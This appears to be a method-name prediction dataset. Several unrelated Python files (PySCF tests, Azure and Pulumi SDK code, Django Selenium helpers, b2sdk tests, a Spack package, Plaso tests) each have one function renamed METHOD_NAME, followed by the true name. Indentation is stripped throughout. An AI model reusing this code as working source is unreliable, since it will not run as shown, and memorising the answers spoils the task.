g2e = ao2mo.incore.general(m._eri, (m.mo_coeff,)*4, compact=False).round(9)
na = fci.cistring.num_strings(norb, nelec//2)
numpy.random.seed(15)
ci0 = numpy.random.random((na,na))
ci0 = ci0 + ci0.T
ci0 /= numpy.linalg.norm(ci0)
ci1 = numpy.random.random((na,na))
ci1 = ci1 + ci1.T
ci1 /= numpy.linalg.norm(ci1)
def METHOD_NAME():
global mol, m, h1e, g2e, ci0, ci1
del mol, m, h1e, g2e, ci0, ci1
class KnownValues(unittest.TestCase):
def test_contract(self):
ci1 = fci.direct_spin0.contract_1e(h1e, ci0, norb, nelec)
ci1ref = fci.direct_spin1.contract_1e(h1e, ci0, norb, nelec)
self.assertTrue(numpy.allclose(ci1ref, ci1))
self.assertAlmostEqual(numpy.linalg.norm(ci1), 9.1191973750140729, 7)
ci1 = fci.direct_spin0.contract_2e(g2e, ci0, norb, nelec)
ci1ref = fci.direct_spin1.contract_2e(g2e, ci0, norb, nelec)
self.assertTrue(numpy.allclose(ci1ref, ci1))
self.assertAlmostEqual(numpy.linalg.norm(ci1), 15.076640155228787, 7)
def test_kernel(self):
e, c = fci.direct_spin0.kernel(h1e, g2e, norb, nelec)
self.assertAlmostEqual(e, -9.1491239851241737, 7)
e = fci.direct_spin0.energy(h1e, g2e, c, norb, nelec)
self.assertAlmostEqual(e, -9.1491239851241737, 7)
def test_rdm1(self):
dm1ref = fci.direct_spin1.make_rdm1(ci0, norb, nelec)
dm1 = fci.direct_spin0.make_rdm1(ci0, norb, nelec)
self.assertTrue(numpy.allclose(dm1ref, dm1))
self.assertAlmostEqual(numpy.linalg.norm(dm1), 2.7059849569286722, 10)
norb1 = nelec
na = fci.cistring.num_strings(norb1, nelec//2)
ci1 = numpy.random.random((na,na))
ci1 = ci1 + ci1.T
dm1 = fci.direct_spin0.make_rdm1(ci1, norb1, nelec)
ref1 = fci_slow.make_rdm1(ci1, norb1, nelec)
self.assertAlmostEqual(abs(ref1-dm1).max(), 0, 10)
def test_rdm12(self):
dm1ref, dm2ref = fci.direct_spin1.make_rdm12(ci0, norb, nelec)
dm1, dm2 = fci.direct_spin0.make_rdm12(ci0, norb, nelec)
self.assertTrue(numpy.allclose(dm1ref, dm1))
self.assertTrue(numpy.allclose(dm2ref, dm2))
self.assertAlmostEqual(numpy.linalg.norm(dm1), 2.7059849569286731, 10)
self.assertAlmostEqual(numpy.linalg.norm(dm2), 7.8811473403497736, 10)
norb1 = nelec
na = fci.cistring.num_strings(norb1, nelec//2)
ci1 = numpy.random.random((na,na))
ci1 = ci1 + ci1.T
dm1, dm2 = fci.direct_spin0.make_rdm12(ci1, norb1, nelec)
ref1, ref2 = fci_slow.make_rdm12(ci1, norb1, nelec)
self.assertAlmostEqual(abs(ref1-dm1).max(), 0, 10)
self.assertAlmostEqual(abs(ref2-dm2).max(), 0, 10)
def test_trans_rdm1(self):
dm1ref = fci.direct_spin1.trans_rdm1(ci0, ci1, norb, nelec)
dm1 = fci.direct_spin0.trans_rdm1(ci0, ci1, norb, nelec)
self.assertTrue(numpy.allclose(dm1ref, dm1))
self.assertAlmostEqual(numpy.linalg.norm(dm1), 2.5485017426647461, 10)
dm0 = fci.direct_spin0.make_rdm1(ci0, norb, nelec)
dm1 = fci.direct_spin0.trans_rdm1(ci0, ci0, norb, nelec)
self.assertTrue(numpy.allclose(dm1, dm0))
def test_trans_rdm12(self):
dm1ref, dm2ref = fci.direct_spin1.trans_rdm12(ci0, ci1, norb, nelec)
dm1, dm2 = fci.direct_spin0.trans_rdm12(ci0, ci1, norb, nelec)
self.assertTrue(numpy.allclose(dm1ref, dm1))
self.assertTrue(numpy.allclose(dm2ref, dm2))
self.assertAlmostEqual(numpy.linalg.norm(dm1), 2.5485017426647461, 10)
self.assertAlmostEqual(numpy.linalg.norm(dm2), 7.7327573770739235, 10)
_,dm0 = fci.direct_spin0.make_rdm12(ci0, norb, nelec)
_,dm2 = fci.direct_spin0.trans_rdm12(ci0, ci0, norb, nelec)
self.assertTrue(numpy.allclose(dm2,dm0))
def test_davidson_only(self):
x = 3.0 * 0.529177249
y = (2.54 - 0.46 * 3.0) * 0.529177249
mol = gto.M(
verbose = 0,
atom = [
['Be',( 0., 0. , 0. )],
['H', ( x, -y , 0. )],
['H', ( x, y , 0. )],],
symmetry = True,
basis = '6-311g')
mf = scf.RHF(mol)
mf.run(conv_tol=1e-10)
mf._scf = mf
h1e = mcscf.casci.h1e_for_cas(mf, mf.mo_coeff, ncas=2, ncore=2)[0]
eri = ao2mo.incore.full(mf._eri, mf.mo_coeff[:,2:4])
cis = fci.direct_spin0.FCISolver(mol)
cis.davidson_only = True
ci0 = numpy.zeros((2,2))
ci0[0,0] = 1
e, c = cis.kernel(h1e, eri, 2, 2, ci0)
self.assertAlmostEqual(e, -0.80755526695538049, 7)
cis = fci.direct_spin0_symm.FCISolver(mol)
cis.wfnsym = 5
self.assertRaises(RuntimeError,
cis.kernel, h1e, eri, 2, 2, orbsym=mf.mo_coeff.orbsym[2:4])
def test_gen_linkstr(self):
sol = fci.direct_spin0.FCI(mol)
link1 = sol.gen_linkstr(7, 6, tril=True)
link1[:,:,1] = 0
link2 = sol.gen_linkstr(7, (3,3), tril=False)
self.assertAlmostEqual(abs(link1 - fci.cistring.reform_linkstr_index(link2)).max(), 0, 12)
def test_small_system(self):
sol = fci.direct_spin0.FCI()
norb = 6
nelec = (3,3)
numpy.random.seed(9)
h1e = numpy.random.random((norb,norb))
h1e = h1e + h1e.T
g2e = numpy.random.random((norb,norb,norb,norb))
eri = .5* ao2mo.restore(1, ao2mo.restore(8, g2e, norb), norb)
h = fci.direct_spin1.pspace(h1e, eri, norb, nelec, np=5000)[1]
eref, c0 = numpy.linalg.eigh(h)
e, c1 = sol.kernel(h1e, eri, norb, (norb,norb))
self.assertAlmostEqual(e, 20.52279077686709, 12)
e, c1 = sol.kernel(h1e, eri, norb, nelec, nroots=4)
self.assertAlmostEqual(abs(eref[[0,1,3,5]] - e).max(), 0, 8)
if __name__ == "__main__":
print("Full Tests for spin0")
unittest.main() | null |
main | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.identity import DefaultAzureCredential
from azure.mgmt.testbase import TestBase
"""
# PREREQUISITES
pip install azure-identity
pip install azure-mgmt-testbase
# USAGE
python package_update.py
Before running the sample, please set the values of the client ID, tenant ID and client secret
of the AAD application as environment variables: AZURE_CLIENT_ID, AZURE_TENANT_ID,
AZURE_CLIENT_SECRET. For more info about how to get the value, please see:
https://docs.microsoft.com/azure/active-directory/develop/howto-create-service-principal-portal
"""
def METHOD_NAME():
client = TestBase(
credential=DefaultAzureCredential(),
subscription_id="subscription-id",
)
response = client.packages.begin_update(
resource_group_name="contoso-rg1",
test_base_account_name="contoso-testBaseAccount1",
package_name="contoso-package2",
parameters={
"properties": {
"blobPath": "storageAccountPath/package.zip",
"flightingRing": "Insider Beta Channel",
"isEnabled": False,
"targetOSList": [
{"osUpdateType": "Security updates", "targetOSs": ["Windows 10 2004", "Windows 10 1903"]}
],
"tests": [
{
"commands": [
{
"action": "Install",
"alwaysRun": True,
"applyUpdateBefore": False,
"content": "app/scripts/install/job.ps1",
"contentType": "Path",
"maxRunTime": 1800,
"name": "Install",
"restartAfter": True,
"runAsInteractive": True,
"runElevated": True,
},
{
"action": "Launch",
"alwaysRun": False,
"applyUpdateBefore": True,
"content": "app/scripts/launch/job.ps1",
"contentType": "Path",
"maxRunTime": 1800,
"name": "Launch",
"restartAfter": False,
"runAsInteractive": True,
"runElevated": True,
},
{
"action": "Close",
"alwaysRun": False,
"applyUpdateBefore": False,
"content": "app/scripts/close/job.ps1",
"contentType": "Path",
"maxRunTime": 1800,
"name": "Close",
"restartAfter": False,
"runAsInteractive": True,
"runElevated": True,
},
{
"action": "Uninstall",
"alwaysRun": True,
"applyUpdateBefore": False,
"content": "app/scripts/uninstall/job.ps1",
"contentType": "Path",
"maxRunTime": 1800,
"name": "Uninstall",
"restartAfter": False,
"runAsInteractive": True,
"runElevated": True,
},
],
"isActive": True,
"testType": "OutOfBoxTest",
}
],
},
"tags": {},
},
).result()
print(response)
# x-ms-original-file: specification/testbase/resource-manager/Microsoft.TestBase/preview/2022-04-01-preview/examples/PackageUpdate.json
if __name__ == "__main__":
METHOD_NAME() | null |
find visible by css | import os
import random
import subprocess
import unittest
from pathlib import Path
from django.conf import settings
from django.contrib.staticfiles.testing import StaticLiveServerTestCase
from selenium import webdriver
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.ui import WebDriverWait
# Django 1.11 removes the ability to supply a port range for liveserver tests,
# so we replicate that here. See: https://code.djangoproject.com/ticket/28212
# and https://code.djangoproject.com/ticket/26011
test_port_range = list(range(6080, 6580))
# Shuffle the ports so that repeated runs locally are unlikely to try to reopen
# a port in the TIME_WAIT state
random.shuffle(test_port_range)
available_test_ports = iter(test_port_range)
def use_browserstack():
return os.environ.get("GITHUB_ACTIONS") or os.environ.get("USE_BROWSERSTACK")
@unittest.skipIf(
os.environ.get("TEST_SUITE") == "nonfunctional",
"nonfunctional tests specified in TEST_SUITE environment variable",
)
class SeleniumTestCase(StaticLiveServerTestCase):
host = "0.0.0.0"
display = None
@classmethod
def setUpClass(cls):
cls.port = next(available_test_ports)
try:
cls.browser = cls.get_browser()
except Exception:
if cls.display:
cls.display.stop()
raise
cls.browser.maximize_window()
cls.browser.implicitly_wait(1)
super(SeleniumTestCase, cls).setUpClass()
@classmethod
def get_browser(cls):
if use_browserstack():
return cls.get_browserstack_browser()
else:
if cls.use_xvfb():
from pyvirtualdisplay import Display
cls.display = Display(visible=0, size=(1200, 800))
cls.display.start()
return cls.get_firefox_driver()
@classmethod
def get_browserstack_browser(cls):
browser, browser_version, browserstack_os, browserstack_os_version = os.environ[
"BROWSER"
].split(":")
local_identifier = os.environ["BROWSERSTACK_LOCAL_IDENTIFIER"]
caps = {
"browserName": browser,
"browserVersion": browser_version,
}
caps["bstack:options"] = {
"os": browserstack_os,
"osVersion": browserstack_os_version,
"resolution": "1600x1200",
"local": "true",
"localIdentifier": local_identifier,
"projectName": os.environ["BROWSERSTACK_PROJECT_NAME"],
"buildName": os.environ["BROWSERSTACK_BUILD_NAME"],
}
username = os.environ["BROWSERSTACK_USERNAME"]
access_key = os.environ["BROWSERSTACK_ACCESS_KEY"]
hub_url = "https://%s:%[email protected]/wd/hub" % (
username,
access_key,
)
return webdriver.Remote(
desired_capabilities=caps, command_executor="%s" % hub_url
)
@classmethod
def use_xvfb(cls):
if not os.environ.get("SHOW_BROWSER", False):
return (
subprocess.call(
"type xvfb-run",
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
== 0
)
else:
return False
@classmethod
def get_firefox_driver(cls):
# Newer releases of Ubuntu package Firefox as a Snap, meaning that it comes with
# sandboxing restrictions that prevent it writing temporary profiles into the
# default system tmpdir. We workaround this by changing TMPDIR to point to a
# directory in the project root (which we assume is within the currently running
# user's home directory). See:
# https://github.com/mozilla/geckodriver/releases/tag/v0.32.0
tmpdir = Path(settings.REPO_ROOT) / "tmp"
tmpdir.mkdir(exist_ok=True)
orig_tmp = os.environ.get("TMPDIR")
os.environ["TMPDIR"] = str(tmpdir)
try:
return webdriver.Firefox(
log_path="%s/logs/webdriver.log" % settings.REPO_ROOT
)
finally:
if orig_tmp is not None:
os.environ["TMPDIR"] = orig_tmp
else:
del os.environ["TMPDIR"]
@classmethod
def tearDownClass(cls):
cls.browser.quit()
if cls.display:
cls.display.stop()
super(SeleniumTestCase, cls).tearDownClass()
def _find_and_wait(self, locator_type, locator, waiter):
wait = 15
try:
element = WebDriverWait(self.browser, wait).until(
waiter((locator_type, locator))
)
return element
except TimeoutException:
raise AssertionError("Expected to find element %s" % locator)
def find_by_xpath(self, locator):
return self._find_and_wait(By.XPATH, locator, EC.presence_of_element_located)
def find_visible_by_xpath(self, locator):
return self._find_and_wait(By.XPATH, locator, EC.visibility_of_element_located)
def find_by_css(self, locator):
return self._find_and_wait(
By.CSS_SELECTOR, locator, EC.presence_of_element_located
)
def METHOD_NAME(self, locator):
return self._find_and_wait(
By.CSS_SELECTOR, locator, EC.visibility_of_element_located
) | null |
name | # coding=utf-8
# *** WARNING: this file was generated by pulumi. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import copy
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = [
'GetGeoBackupPolicyResult',
'AwaitableGetGeoBackupPolicyResult',
'get_geo_backup_policy',
'get_geo_backup_policy_output',
]
@pulumi.output_type
class GetGeoBackupPolicyResult:
"""
A Geo backup policy.
"""
def __init__(__self__, id=None, kind=None, location=None, METHOD_NAME=None, state=None, storage_type=None, type=None):
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if kind and not isinstance(kind, str):
raise TypeError("Expected argument 'kind' to be a str")
pulumi.set(__self__, "kind", kind)
if location and not isinstance(location, str):
raise TypeError("Expected argument 'location' to be a str")
pulumi.set(__self__, "location", location)
if METHOD_NAME and not isinstance(METHOD_NAME, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", METHOD_NAME)
if state and not isinstance(state, str):
raise TypeError("Expected argument 'state' to be a str")
pulumi.set(__self__, "state", state)
if storage_type and not isinstance(storage_type, str):
raise TypeError("Expected argument 'storage_type' to be a str")
pulumi.set(__self__, "storage_type", storage_type)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def id(self) -> str:
"""
Resource ID.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def kind(self) -> str:
"""
Kind of geo backup policy. This is metadata used for the Azure portal experience.
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter
def location(self) -> str:
"""
Backup policy location.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def METHOD_NAME(self) -> str:
"""
Resource name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def state(self) -> str:
"""
The state of the geo backup policy.
"""
return pulumi.get(self, "state")
@property
@pulumi.getter(METHOD_NAME="storageType")
def storage_type(self) -> str:
"""
The storage type of the geo backup policy.
"""
return pulumi.get(self, "storage_type")
@property
@pulumi.getter
def type(self) -> str:
"""
Resource type.
"""
return pulumi.get(self, "type")
class AwaitableGetGeoBackupPolicyResult(GetGeoBackupPolicyResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetGeoBackupPolicyResult(
id=self.id,
kind=self.kind,
location=self.location,
METHOD_NAME=self.METHOD_NAME,
state=self.state,
storage_type=self.storage_type,
type=self.type)
def get_geo_backup_policy(database_name: Optional[str] = None,
geo_backup_policy_name: Optional[str] = None,
resource_group_name: Optional[str] = None,
server_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetGeoBackupPolicyResult:
"""
Gets a Geo backup policy for the given database resource.
Azure REST API version: 2021-11-01.
:param str database_name: The name of the database.
:param str geo_backup_policy_name: The name of the Geo backup policy. This should always be 'Default'.
:param str resource_group_name: The name of the resource group that contains the resource. You can obtain this value from the Azure Resource Manager API or the portal.
:param str server_name: The name of the server.
"""
__args__ = dict()
__args__['databaseName'] = database_name
__args__['geoBackupPolicyName'] = geo_backup_policy_name
__args__['resourceGroupName'] = resource_group_name
__args__['serverName'] = server_name
opts = pulumi.InvokeOptions.merge(_utilities.get_invoke_opts_defaults(), opts)
__ret__ = pulumi.runtime.invoke('azure-native:sql:getGeoBackupPolicy', __args__, opts=opts, typ=GetGeoBackupPolicyResult).value
return AwaitableGetGeoBackupPolicyResult(
id=pulumi.get(__ret__, 'id'),
kind=pulumi.get(__ret__, 'kind'),
location=pulumi.get(__ret__, 'location'),
METHOD_NAME=pulumi.get(__ret__, 'name'),
state=pulumi.get(__ret__, 'state'),
storage_type=pulumi.get(__ret__, 'storage_type'),
type=pulumi.get(__ret__, 'type'))
@_utilities.lift_output_func(get_geo_backup_policy)
def get_geo_backup_policy_output(database_name: Optional[pulumi.Input[str]] = None,
geo_backup_policy_name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
server_name: Optional[pulumi.Input[str]] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetGeoBackupPolicyResult]:
"""
Gets a Geo backup policy for the given database resource.
Azure REST API version: 2021-11-01.
:param str database_name: The name of the database.
:param str geo_backup_policy_name: The name of the Geo backup policy. This should always be 'Default'.
:param str resource_group_name: The name of the resource group that contains the resource. You can obtain this value from the Azure Resource Manager API or the portal.
:param str server_name: The name of the server.
"""
... | null |
early | ######################################################################
#
# File: test/unit/v1/test_version_utils.py
#
# Copyright 2019 Backblaze Inc. All Rights Reserved.
#
# License https://www.backblaze.com/using_b2_code.html
#
######################################################################
from __future__ import annotations
import warnings
from b2sdk.v1 import rename_argument, rename_function
from ..test_base import TestBase
class TestRenameArgument(TestBase):
VERSION = '0.1.10'
def test_warning(self):
@rename_argument('aaa', 'bbb', '0.1.0', '0.2.0', current_version=self.VERSION)
def easy(bbb):
""" easy docstring """
return bbb
# check that warning is not emitted too early
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
assert easy(5) == 5
assert easy(bbb=5) == 5
assert easy.__name__ == 'easy'
assert easy.__doc__ == ' easy docstring '
assert len(w) == 0
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
assert easy(aaa=5) == 5
assert len(w) == 1
assert issubclass(w[-1].category, DeprecationWarning)
assert str(
w[-1].message
) == "'aaa' is a deprecated argument for 'easy' function/method - it was renamed to 'bbb' in version 0.1.0. Support for the old name is going to be dropped in 0.2.0.", str(
w[-1].message
)
def test_outdated_replacement(self):
with self.assertRaises(
AssertionError,
msg=
f"rename_argument decorator is still used in version {self.VERSION} when old argument name 'aaa' was scheduled to be dropped in 0.1.2. It is time to remove the mapping.",
):
@rename_argument('aaa', 'bbb', '0.1.0', '0.1.2', current_version=self.VERSION)
def late(bbb):
return bbb
assert late # make linters happy
def test_future_replacement(self):
with self.assertRaises(
AssertionError,
msg=
"rename_argument decorator indicates that the replacement of argument 'aaa' should take place in the future version 0.2.0, while the current version is 0.2.2. It looks like should be _discouraged_ at this point and not _deprecated_ yet. Consider using 'discourage_argument' decorator instead."
):
@rename_argument('aaa', 'bbb', '0.2.0', '0.2.2', current_version=self.VERSION)
def METHOD_NAME(bbb):
return bbb
assert METHOD_NAME # make linters happy
def test_inverted_versions(self):
with self.assertRaises(
AssertionError,
msg=
"rename_argument decorator is set to start renaming argument 'aaa' starting at version 0.2.2 and finishing in 0.2.0. It needs to start at a lower version and finish at a higher version."
):
@rename_argument('aaa', 'bbb', '0.2.2', '0.2.0', current_version=self.VERSION)
def backwards(bbb):
return bbb
assert backwards # make linters happy
class TestRenameFunction(TestBase):
VERSION = '0.1.10'
def test_rename_function(self):
def new(bbb):
return bbb
for i in ('new', new):
@rename_function(i, '0.1.0', '0.2.0', current_version=self.VERSION)
def old(bbb):
return bbb
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
assert old(5) == 5
assert len(w) == 1
assert issubclass(w[-1].category, DeprecationWarning)
assert str(
w[-1].message
) == "'old' is deprecated since version 0.1.0 - it was moved to 'new', please switch to use that. The proxy for the old name is going to be removed in 0.2.0.", str(
w[-1].message
) | null |
cmake cache entry | # Copyright 2013-2023 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import os
import socket
import llnl.util.tty as tty
from spack.package import *
def METHOD_NAME(name, value, vtype=None):
"""
Helper that creates CMake cache entry strings used in
'host-config' files.
"""
if vtype is None:
if value == "ON" or value == "OFF":
vtype = "BOOL"
else:
vtype = "PATH"
return 'set({0} "{1}" CACHE {2} "")\n\n'.format(name, value, vtype)
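# For illustration (hypothetical values), the helper above produces strings such as:
#   METHOD_NAME("ENABLE_OPENMP", "ON")              -> 'set(ENABLE_OPENMP "ON" CACHE BOOL "")\n\n'
#   METHOD_NAME("MPI_C_COMPILER", "/usr/bin/mpicc") -> 'set(MPI_C_COMPILER "/usr/bin/mpicc" CACHE PATH "")\n\n'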
class Apcomp(Package):
"""A multi use-case image compositor"""
homepage = "https://github.com/Alpine-DAV/ap_compositor"
git = "https://github.com/Alpine-DAV/ap_compositor.git"
url = (
"https://github.com/Alpine-DAV/ap_compositor/releases/download/v0.0.1/apcomp-v0.0.1.tar.gz"
)
maintainers("cyrush")
version("master", branch="master", submodules="True")
version("0.0.4", sha256="061876dd55e443de91a40d10662496f6bb58b0a3835aec78f5710f5a737d0494")
version("0.0.3", sha256="07e8c1d6a23205f4cc66d0a030e65a69e8344545f4d56213d968b67a410adc6e")
version("0.0.2", sha256="cb2e2c4524889408de2dd3d29665512c99763db13e6f5e35c3b55e52948c649c")
version("0.0.1", sha256="cbf85fe58d5d5bc2f468d081386cc8b79861046b3bb7e966edfa3f8e95b998b2")
variant("openmp", default=True, description="Build with openmp support")
variant("mpi", default=True, description="Build with MPI support")
variant("shared", default=True, description="Build Shared Library")
# set to false for systems that implicitly link mpi
variant("blt_find_mpi", default=True, description="Use BLT CMake Find MPI logic")
depends_on("[email protected]:", type="build")
depends_on("mpi", when="+mpi")
depends_on("llvm-openmp", when="+openmp %apple-clang")
root_cmakelists_dir = "src"
def install(self, spec, prefix):
"""
Build and install APComp
"""
with working_dir("spack-build", create=True):
host_cfg_fname = self.create_host_config(spec, prefix)
cmake_args = []
# if we have a static build, we need to avoid any of
# spack's default cmake settings related to rpaths
# (see: https://github.com/LLNL/spack/issues/2658)
if "+shared" in spec:
cmake_args.extend(std_cmake_args)
else:
for arg in std_cmake_args:
if arg.count("RPATH") == 0:
cmake_args.append(arg)
cmake_args.extend(["-C", host_cfg_fname, "../src"])
print("Configuring APComp...")
cmake(*cmake_args)
print("Building APComp...")
make()
print("Installing APComp...")
make("install")
# install copy of host config for provenance
install(host_cfg_fname, prefix)
def create_host_config(self, spec, prefix):
"""
This method creates a 'host-config' file that specifies
all of the options used to configure and build apcomp.
"""
#######################
# Compiler Info
#######################
c_compiler = env["SPACK_CC"]
cpp_compiler = env["SPACK_CXX"]
#######################################################################
# We directly fetch the names of the actual compilers to create a
# 'host config' file that works outside of the spack install env.
#######################################################################
sys_type = spec.architecture
# if on llnl systems, we can use the SYS_TYPE
if "SYS_TYPE" in env:
sys_type = env["SYS_TYPE"]
##############################################
# Find and record what CMake is used
##############################################
if "+cmake" in spec:
cmake_exe = spec["cmake"].command.path
else:
cmake_exe = which("cmake")
if cmake_exe is None:
msg = "failed to find CMake (and cmake variant is off)"
raise RuntimeError(msg)
cmake_exe = cmake_exe.path
host_cfg_fname = "%s-%s-%s-apcomp.cmake" % (socket.gethostname(), sys_type, spec.compiler)
cfg = open(host_cfg_fname, "w")
cfg.write("##################################\n")
cfg.write("# spack generated host-config\n")
cfg.write("##################################\n")
cfg.write("# {0}-{1}\n".format(sys_type, spec.compiler))
cfg.write("##################################\n\n")
# Include path to cmake for reference
cfg.write("# cmake from spack \n")
cfg.write("# cmake executable path: %s\n\n" % cmake_exe)
#######################
# Compiler Settings
#######################
cfg.write("#######\n")
cfg.write("# using %s compiler spec\n" % spec.compiler)
cfg.write("#######\n\n")
cfg.write("# c compiler used by spack\n")
cfg.write(METHOD_NAME("CMAKE_C_COMPILER", c_compiler))
cfg.write("# cpp compiler used by spack\n")
cfg.write(METHOD_NAME("CMAKE_CXX_COMPILER", cpp_compiler))
# shared vs static libs
if "+shared" in spec:
cfg.write(METHOD_NAME("BUILD_SHARED_LIBS", "ON"))
else:
cfg.write(METHOD_NAME("BUILD_SHARED_LIBS", "OFF"))
if "+openmp" in spec:
cfg.write(METHOD_NAME("ENABLE_OPENMP", "ON"))
else:
cfg.write(METHOD_NAME("ENABLE_OPENMP", "OFF"))
if "+mpi" in spec:
mpicc_path = spec["mpi"].mpicc
mpicxx_path = spec["mpi"].mpicxx
# if we are using compiler wrappers on cray systems
# use those for mpi wrappers, b/c spec['mpi'].mpicxx
# etc make return the spack compiler wrappers
# which can trip up mpi detection in CMake 3.14
if cpp_compiler == "CC":
mpicc_path = "cc"
mpicxx_path = "CC"
cfg.write(METHOD_NAME("ENABLE_MPI", "ON"))
cfg.write(METHOD_NAME("MPI_C_COMPILER", mpicc_path))
cfg.write(METHOD_NAME("MPI_CXX_COMPILER", mpicxx_path))
if "+blt_find_mpi" in spec:
cfg.write(METHOD_NAME("ENABLE_FIND_MPI", "ON"))
else:
cfg.write(METHOD_NAME("ENABLE_FIND_MPI", "OFF"))
mpiexe_bin = join_path(spec["mpi"].prefix.bin, "mpiexec")
if os.path.isfile(mpiexe_bin):
# starting with cmake 3.10, FindMPI expects MPIEXEC_EXECUTABLE
# vs the older versions which expect MPIEXEC
if self.spec["cmake"].satisfies("@3.10:"):
cfg.write(METHOD_NAME("MPIEXEC_EXECUTABLE", mpiexe_bin))
else:
cfg.write(METHOD_NAME("MPIEXEC", mpiexe_bin))
else:
cfg.write(METHOD_NAME("ENABLE_MPI", "OFF"))
cfg.write("##################################\n")
cfg.write("# end spack generated host-config\n")
cfg.write("##################################\n")
cfg.close()
host_cfg_fname = os.path.abspath(host_cfg_fname)
tty.info("spack generated conduit host-config file: " + host_cfg_fname)
return host_cfg_fname | null |
test add or update event tag | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Tests for the fake storage writer."""
import os
import unittest
from plaso.containers import events
from plaso.lib import definitions
from plaso.storage.sqlite import writer as sqlite_writer
from tests import test_lib as shared_test_lib
from tests.storage import test_lib
from tests.containers import test_lib as containers_test_lib
class SQLiteStorageFileWriterTest(test_lib.StorageTestCase):
"""Tests for the fake storage writer."""
# pylint: disable=protected-access
def _AddTestEvents(self, storage_writer):
"""Adds tests events to the storage writer.
Args:
storage_writer (SQLiteStorageFileWriter): storage writer.
Returns:
list[EventObject]: test events.
"""
test_events = []
for event, event_data, event_data_stream in (
containers_test_lib.CreateEventsFromValues(self._TEST_EVENTS)):
storage_writer.AddAttributeContainer(event_data_stream)
event_data.SetEventDataStreamIdentifier(event_data_stream.GetIdentifier())
storage_writer.AddAttributeContainer(event_data)
event.SetEventDataIdentifier(event_data.GetIdentifier())
storage_writer.AddAttributeContainer(event)
test_events.append(event)
return test_events
def testAddAttributeContainer(self):
"""Tests the AddAttributeContainer function."""
event_data_stream = events.EventDataStream()
with shared_test_lib.TempDirectory() as temp_directory:
test_path = os.path.join(temp_directory, 'plaso.sqlite')
storage_writer = sqlite_writer.SQLiteStorageFileWriter()
storage_writer.Open(path=test_path)
try:
number_of_containers = storage_writer.GetNumberOfAttributeContainers(
event_data_stream.CONTAINER_TYPE)
self.assertEqual(number_of_containers, 0)
storage_writer.AddAttributeContainer(event_data_stream)
number_of_containers = storage_writer.GetNumberOfAttributeContainers(
event_data_stream.CONTAINER_TYPE)
self.assertEqual(number_of_containers, 1)
finally:
storage_writer.Close()
with self.assertRaises(IOError):
storage_writer.AddAttributeContainer(event_data_stream)
def METHOD_NAME(self):
"""Tests the AddOrUpdateEventTag function."""
with shared_test_lib.TempDirectory() as temp_directory:
test_path = os.path.join(temp_directory, 'plaso.sqlite')
storage_writer = sqlite_writer.SQLiteStorageFileWriter()
storage_writer.Open(path=test_path)
try:
test_events = self._AddTestEvents(storage_writer)
event_tag = events.EventTag()
event_identifier = test_events[1].GetIdentifier()
event_tag.SetEventIdentifier(event_identifier)
event_tag.AddLabel('Label1')
number_of_containers = storage_writer.GetNumberOfAttributeContainers(
event_tag.CONTAINER_TYPE)
self.assertEqual(number_of_containers, 0)
storage_writer.AddOrUpdateEventTag(event_tag)
number_of_containers = storage_writer.GetNumberOfAttributeContainers(
event_tag.CONTAINER_TYPE)
self.assertEqual(number_of_containers, 1)
event_tag = events.EventTag()
event_identifier = test_events[2].GetIdentifier()
event_tag.SetEventIdentifier(event_identifier)
event_tag.AddLabel('Label2')
storage_writer.AddOrUpdateEventTag(event_tag)
number_of_containers = storage_writer.GetNumberOfAttributeContainers(
event_tag.CONTAINER_TYPE)
self.assertEqual(number_of_containers, 2)
event_tag = events.EventTag()
event_identifier = test_events[1].GetIdentifier()
event_tag.SetEventIdentifier(event_identifier)
event_tag.AddLabel('AnotherLabel1')
storage_writer.AddOrUpdateEventTag(event_tag)
number_of_containers = storage_writer.GetNumberOfAttributeContainers(
event_tag.CONTAINER_TYPE)
self.assertEqual(number_of_containers, 2)
event_tags = list(storage_writer.GetAttributeContainers(
event_tag.CONTAINER_TYPE))
self.assertEqual(event_tags[0].labels, ['Label1', 'AnotherLabel1'])
self.assertEqual(event_tags[1].labels, ['Label2'])
finally:
storage_writer.Close()
# TODO: add tests for GetFirstWrittenEventSource
# TODO: add tests for GetNextWrittenEventSource
def testGetSortedEvents(self):
"""Tests the GetSortedEvents function."""
with shared_test_lib.TempDirectory() as temp_directory:
test_path = os.path.join(temp_directory, 'plaso.sqlite')
storage_writer = sqlite_writer.SQLiteStorageFileWriter()
storage_writer.Open(path=test_path)
try:
self._AddTestEvents(storage_writer)
test_events = list(storage_writer.GetSortedEvents())
self.assertEqual(len(test_events), 4)
finally:
storage_writer.Close()
# TODO: add test with time range.
def testOpenClose(self):
"""Tests the Open and Close functions."""
with shared_test_lib.TempDirectory() as temp_directory:
test_path = os.path.join(temp_directory, 'plaso.sqlite')
